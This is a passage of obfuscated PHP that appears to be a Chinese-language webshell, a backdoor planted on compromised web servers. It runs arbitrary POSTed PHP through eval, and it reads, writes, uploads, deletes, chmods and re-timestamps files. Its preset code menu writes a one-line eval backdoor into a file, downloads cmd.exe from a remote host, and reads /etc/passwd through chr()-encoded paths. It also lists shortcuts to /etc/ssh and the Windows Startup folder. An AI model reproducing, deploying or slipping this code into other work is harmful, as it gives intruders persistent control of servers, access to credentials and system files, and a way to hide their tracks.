htmlspecialchars($phpcode) . '</textarea></p><p>'; goto B16; e24: if (isset($_POST['phpcode'])) { goto B2e; fdc: ob_start(); goto Daf; B59: $out = ob_get_contents(); goto C9b; B2e: $phpcode = chop($_POST['phpcode']); goto fdc; C9b: ob_end_clean(); goto d1d; Daf: if (substr($phpcode, 0, 2) == '<?' && substr($phpcode, -2) == '?>') { @eval('?>' . $phpcode . '<?php '); } else { @eval($phpcode); } goto B59; d1d: } else { $phpcode = 'phpinfo();'; $out = '回显窗口'; } goto cec; Fb7: echo '<input type="hidden" name="go" id="go" value="phpeval">'; goto aa6; fb9: echo '<option>---常用代码---</option>'; goto D0f; ac0: subeval(); goto Fb7; cec: echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+'); goto D8d; D8d: echo '<div class="msgbox">' . $msg . '</div>'; goto F07; C63: echo '<option value="echo file_put_contents(\'' . THISDIR . 'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';">远程下载</option>'; goto ef4; F07: echo '<form method="POST">'; goto ac0; F6c: echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\\r\\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\\r\\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>'; goto daf; e07: echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';">复制文件</option>'; goto F4d; D0f: echo '<option value="echo readfile(\'C:/web/t00ls.php\');">读取文件</option>'; goto B25; B25: echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);">写入文件</option>'; goto e07; ea1: echo '<input type="submit" style="width:80px;" value="执行"></p></div>'; goto F87; Ac7: break; goto F83; F83: case "edit": case "editor": goto E80; bfc: echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>'; goto Bdb; fc9: if ($iconv) { goto cde; Fb6: $selects = array('normal' => '默认', 'utf' => 'utf-8'); goto Ae3; cde: echo '编码 <select name="tostr">'; goto Fb6; a74: echo '</select>'; goto c2f; Ae3: foreach ($selects as $var => $name) { echo '<option value="' . $var . '"' . ($name == $chst ? ' selected' : '') . '>' . $name . '</option>'; } goto a74; c2f: } goto C81; b82: echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> '; goto Cfd; E80: $file = strdir($_POST['godir'] . '/' . $_POST['govar']); goto f4e; f4e: $iconv = function_exists('iconv'); goto Fee; dc7: subeval(); goto d7d; C81: echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">' . htmlspecialchars($code) . '</textarea></div></form>'; goto b82; fe6: echo '<form name="editfrm" id="editfrm" method="POST">'; goto dc7; Fb2: echo '<div class="actall">文件 <input type="text" name="filename" value="' . $file . '" style="width:528px;"> '; goto fc9; d90: subeval(); goto bfc; Cfd: echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">'; goto d90; Fee: if (!file_exists($file)) { $msg = '【新建文件】'; } else { goto b87; Cd8: if (preg_match('~[\\x{4e00}-\\x{9fa5}]+~u', $code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8', 'GB2312//IGNORE', $code); } goto c16; c16: $size = size(filesize($file)); goto Bf4; b87: $code = filer($file); goto b91; Bf4: $msg = '【文件属性 ' . substr(decoct(fileperms($file)), -4) . '】 【文件大小 ' . $size . '】 【文件编码 ' . $chst . '】'; goto e0d; b91: $chst = '默认'; goto Cd8; e0d: } goto A31; d7d: echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">'; goto Cee; Cee: echo '<input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">'; goto Fb2; a7f: echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - ' . $msg . '</div>'; goto fe6; A31: echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg=='); goto a7f; Bdb: break; goto Ff7; Ff7: case "upfiles": goto F75; D50: subeval(); goto D31; ecd: echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">'; goto Bed; F75: $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir']; goto Ef5; e71: echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> '; goto B9e; D31: echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>'; goto cad; Ef5: $msg = '【最大上传文件 ' . get_cfg_var("upload_max_filesize") . '】 【POST最大提交数据 ' . get_cfg_var("post_max_size") . '】'; goto c0f; cad: break; goto ce1; fad: echo '<div class="msgbox">' . $msg . '</div>'; goto ecd; B9e: echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . $updir . '">'; goto D50; b64: if (isset($_FILES['uploads']) && isset($_POST['renames'])) { goto faa; Bcf: $msgs = array(); goto A17; faa: $uploads = $_FILES['uploads']; goto Bcf; A17: for ($i = 1; $i < $max; $i++) { if ($uploads['error'][$i] == UPLOAD_ERR_OK) { goto A73; A73: $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i]; goto bc5; d69: $msgs[$i] = fileu($filea, $fileb) ? '<br><h2>上传成功 ' . $rename . '</h2>' : '<br><h1>上传失败 ' . $rename . '</h1>'; goto Bfe; D0e: $fileb = strdir($updir . '/' . $rename); goto d69; bc5: $filea = $uploads['tmp_name'][$i]; goto D0e; Bfe: } } goto C1b; C1b: } goto fad; a75: echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="' . $updir . '"></p>'; goto d1e; c0f: $max = 10; goto b64; d1e: for ($i = 1; $i < $max; $i++) { echo '<p>附件' . $i . ' <input type="file" name="uploads[' . $i . ']" style="width:300px;"> 重命名 <input type="text" name="renames[' . $i . ']" style="width:128px;"> ' . $msgs[$i] . '</p>'; } goto e71; Bed: subeval(); goto be1; be1: echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">'; goto a75; ce1: default: goto de5; A11: echo '<input type="hidden" name="var" id="var" value="">'; goto aa0; dbb: echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>'; goto bc0; b79: break; goto D5b; Cd7: echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">'; goto Dd6; Fb4: echo '</select></form></div><div class="actall">'; goto c6c; Ae4: echo '<option value="/var/tmp/">Linux-var</option>'; goto B54; B3e: $nowdir = strtr($nowdir, array('\'' => '%27', '"' => '%22')); goto ecf; C03: echo '<div class="actall"><form name="frm" id="frm" method="POST">'; goto a34; bc0: echo '<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-启动</option>'; goto Fd9; b41: echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> '; goto D81; c6c: echo '<input type="button" value="新建文件" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> '; goto df1; e22: echo '</table>'; goto bb4; a84: if (isset($_POST['act'])) { switch ($_POST['act']) { case "a": if (!$_POST['files']) { $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>'; } else { goto bca; Efd: $msg = $msg = $i ? '<h2>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '成功</h2>' : '<h1>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '失败</h1>'; goto E7a; bca: $i = 0; goto Ff9; Ff9: foreach ($_POST['files'] as $filename) { $i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0; } goto Efd; E7a: } break; case "b": if (!$_POST['files']) { $msg = '<h1>请选择文件</h1>'; } else { goto B94; bb2: foreach ($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0; } goto Fc1; Fc1: $msg = $i ? '<h2>共删除 ' . $i . ' 个文件成功</h2>' : '<h1>共删除 ' . $i . ' 个文件失败</h1>'; goto A06; B94: $i = 0; goto bb2; A06: } break; case "c": if (!$_POST['files']) { $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>'; } elseif (!ereg("^[0-7]{4}\$", $_POST['var'])) { $msg = '<h1>属性值错误</h1>'; } else { goto A04; A04: $i = 0; goto B35; B35: foreach ($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0; } goto fb7; fb7: $msg = $i ? '<h2>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '失败</h1>'; goto E61; E61: } break; case "d": if (!$_POST['files']) { $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>'; } elseif (!preg_match('/(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)/', $_POST['var'])) { $msg = '<h1>时间格式错误 ' . $_POST['var'] . '</h1>'; } else { goto Af3; E6d: $msg = $i ? '<h2>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '失败</h1>'; goto d14; Af3: $i = 0; goto b9f; b9f: foreach ($_POST['files'] as $filename) { $i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0; } goto E6d; d14: } break; case "e": goto Dfb; Bf1: break; goto d99; E99: if (file_exists($path)) { $msg = '<h1>目录已存在 ' . $_POST['var'] . '</h1>'; } else { $msg = @mkdir($path, 0777) ? '<h2>创建目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>创建目录 ' . $_POST['var'] . ' 失败</h1>'; } goto Bf1; Dfb: $path = strdir($nowdir . $_POST['var'] . '/'); goto E99; d99: case "f": goto C37; bcb: $data = @file_get_contents($_POST['var'], false, $stream); goto d77; d77: $filename = array_pop(explode('/', $_POST['var'])); goto eba; ee7: break; goto c23; bf5: if (function_exists('stream_context_create')) { $stream = stream_context_create($context); } goto bcb; eba: if ($data) { $msg = filew(strdir($nowdir . $filename), $data, 'wb') ? '<h2>下载 ' . $filename . ' 成功</h2>' : '<h1>下载 ' . $filename . ' 失败</h1>'; } else { $msg = '<h1>下载失败或不支持下载</h1>'; } goto ee7; C37: $context = array('http' => array('timeout' => 30)); goto bf5; c23: case "rf": goto Db5; Db5: $files = explode('|x|', $_POST['var']); goto f5c; f5c: if (count($files) != 2) { $msg = '<h1>输入错误</h1>'; } else { $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? '<h2>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 成功</h2>' : '<h1>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 失败</h1>'; } goto Ada; Ada: break; goto Bfd; Bfd: case "pd": goto c31; eaa: if (count($files) != 2) { $msg = '<h1>输入错误</h1>'; } else { $path = strdir($nowdir . $files[1]); $msg = @chmod($path, base_convert($files[0], 8, 10)) ? '<h2>修改' . $files[1] . '属性为' . $files[0] . '成功</h2>' : '<h1>修改' . $files[1] . '属性为' . $files[0] . '失败</h1>'; } goto ec9; c31: $files = explode('|x|', $_POST['var']); goto eaa; ec9: break; goto D3a; D3a: case "edit": if (isset($_POST['filename']) && isset($_POST['filecode'])) { if ($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']); } $msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '<h2>保存成功 ' . $_POST['filename'] . '</h2>' : '<h1>保存失败 ' . $_POST['filename'] . '</h1>'; } break; case "deltree": goto ae9; F0c: if (!file_exists($deldir)) { $msg = '<h1>目录 ' . $_POST['var'] . ' 不存在</h1>'; } else { $msg = deltree($deldir) ? '<h2>删除目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>删除目录 ' . $_POST['var'] . ' 失败</h1>'; } goto A48; ae9: $deldir = strdir($nowdir . $_POST['var'] . '/'); goto F0c; A48: break; goto C34; C34: } } goto C80; b99: echo '<option value="C:/Program Files/">Win-Program</option>'; goto dbb; fa5: echo '<input type="file" name="upfile" style="width:286px;height:21px;"> '; goto d73; f65: echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","' . $mtime . '","d");\'> '; goto D94; de5: if (isset($_FILES['upfile'])) { if ($_FILES['upfile']['name'] == '') { $msg = '<h1>请选择文件</h1>'; } else { goto b3a; eee: $msg = fileu($filea, $fileb) ? '<h2>上传文件' . $rename . '成功</h2>' : '<h1>上传文件' . $rename . '失败</h1>'; goto abe; A08: $filea = $_FILES['upfile']['tmp_name']; goto C3c; b3a: $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; goto A08; C3c: $fileb = strdir($nowdir . $rename); goto eee; abe: } } goto a84; b35: echo '<option value="/usr/local/">Linux-local</option>'; goto ccf; fa0: echo '</form></div>'; goto E44; b7c: echo '上传重命名为 <input type="text" name="rename" style="width:128px;">'; goto fa0; cd2: $array = showdir($nowdir); goto E49; d73: echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上传" style="width:50px;"> '; goto b7c; Ae2: echo '<input type="button" value="批量上传" onclick="go(\'upfiles\',\'' . $nowdir . '\');" style="width:68px;"> '; goto F37; Aec: if ($array) { goto b08; Cef: $dnum = $fnum = 0; goto a43; e15: foreach ($array['file'] as $path => $name) { goto a59; fbf: echo '<td><input type="checkbox" name="files[]" value="' . $name . '"><a target="_blank" href="' . $thisurl . $name . '">' . strtr($name, array('%27' => '\'', '%22' => '"')) . '</a></td>'; goto A45; b75: echo '<td>' . $ctime . '</td>'; goto a72; Ce7: echo '<tr>'; goto fbf; E4e: $mtime = date('Y-m-d H:i:s', filemtime($path)); goto bf4; c57: echo '<td align="right"><a href="javascript:go(\'down\',\'' . $name . '\');">' . $size . '</a></td>'; goto f1e; c9a: if ($prem == "0444") { echo '<td><a href="javascript:acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');" style="color:red;">' . $prem . '</a></td>'; } else { echo '<td><a href="javascript:acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>'; } goto b75; E46: echo '<a href="javascript:acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>'; goto c9a; bf4: $size = size(filesize($path)); goto Ce7; A45: echo '<td><a href="javascript:go(\'edit\',\'' . $name . '\');">编辑</a> '; goto E46; c66: $ctime = date('Y-m-d H:i:s', filectime($path)); goto E4e; f1e: echo '</tr>'; goto e1d; a59: $prem = substr(decoct(fileperms($path)), -4); goto c66; a72: echo '<td>' . $mtime . '</td>'; goto c57; e1d: $fnum++; goto f6a; f6a: } goto Ed3; b08: asort($array['dir']); goto fd1; a43: foreach ($array['dir'] as $path => $name) { goto D8f; D8f: $prem = substr(decoct(fileperms($path)), -4); goto c68; De7: echo '<td><a href="javascript:cd(\'' . $nowdir . $name . '\');"><b>' . strtr($name, array('%27' => '\'', '%22' => '"')) . '</b></a></td>'; goto d60; c68: $ctime = date('Y-m-d H:i:s', filectime($path)); goto c14; b12: $dnum++; goto d50; c14: $mtime = date('Y-m-d H:i:s', filemtime($path)); goto d5d; Ebb: echo '<td>' . $mtime . '</td>'; goto e5d; d5d: echo '<tr>'; goto De7; d60: echo '<td><a href="javascript:dels(\'' . $name . '\');">删除</a> '; goto Ed9; e5d: echo '<td>-</td>'; goto a1f; a16: echo '<td><a href="javascript:acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>'; goto d59; Ed9: echo '<a href="javascript:acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>'; goto a16; d59: echo '<td>' . $ctime . '</td>'; goto Ebb; a1f: echo '</tr>'; goto b12; d50: } goto e15; fd1: asort($array['file']); goto Cef; Ed3: } goto cb4; a34: subeval(); goto eef; c7c: echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>'; goto bee; Bdd: echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">'; goto fa5; C01: if (!$chmod) { $msg .= ' - <h1>无法读取目录</h1>'; } goto cd2; B69: echo '<input type="button" value="下载文件" onclick="txts(\'下载文件到当前目录\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> '; goto Ae2; B54: echo '<option value="/etc/ssh/">Linux-ssh</option>'; goto Fb4; D94: echo '目录[' . $dnum . '] - 文件[' . $fnum . '] - 属性[' . $chmod . ']</div></form>'; goto b79; df1: echo '<input type="button" value="创建目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> '; goto B69; Dd1: echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> '; goto f65; eef: echo (is_writable($nowdir) ? '<h2>路径</h2>' : '<h1>路径</h1>') . ' <input type="text" name="dir" id="dir" style="width:508px;" value="' . strdir($nowdir . '/') . '"> '; goto Bfa; bee: echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>'; goto b99; F37: echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">'; goto D71; D3d: echo '<input type="button" onclick="cd(\'' . THISDIR . '\');" style="width:68px;" value="程序目录"> '; goto B81; E34: echo '<input type="button" value="删除" style="width:50px;" onclick=\'dels("b");\'> '; goto Dd1; cb4: unset($array); goto e22; E49: $thisurl = strdir('/' . strtr($nowdir, array(ROOTDIR => '')) . '/'); goto B3e; Fd9: echo '<option value="C:/Windows/Temp/">Win-TEMP</option>'; goto b35; D71: subeval(); goto Bdd; C80: $chmod = substr(decoct(fileperms($nowdir)), -4); goto C01; A60: echo '<option>---特殊目录---</option>'; goto c7c; E44: echo '<form name="frm1" id="frm1" method="POST"><table class="tables">'; goto A8c; D81: echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","' . $nowdir . '","a");\'> '; goto E34; bb4: echo '<div class="actall" style="text-align:left;">'; goto b41; ecf: echo '<div class="msgbox">' . $msg . '</div>'; goto C03; aa0: echo '<th><a href="javascript:cd(\'' . dirname($nowdir) . '/\');">上级目录</a></th><th style="width:8%">操作</th><th style="width:5%">属性</th><th style="width:17%">创建时间</th><th style="width:17%">修改时间</th><th style="width:8%">下载</th>'; goto Aec; A8c: subeval(); goto Cd7; ccf: echo '<option value="/tmp/">Linux-tmp</option>'; goto Ae4; B81: echo '<select onchange="cd(options[selectedIndex].value);">'; goto A60; d76: echo '<input type="button" onclick="cd(\'' . ROOTDIR . '\');" style="width:68px;" value="根目录"> '; goto D3d; Bfa: echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> '; goto d76; Dd6: echo '<input type="hidden" name="act" id="act" value="">'; goto A11; D5b: }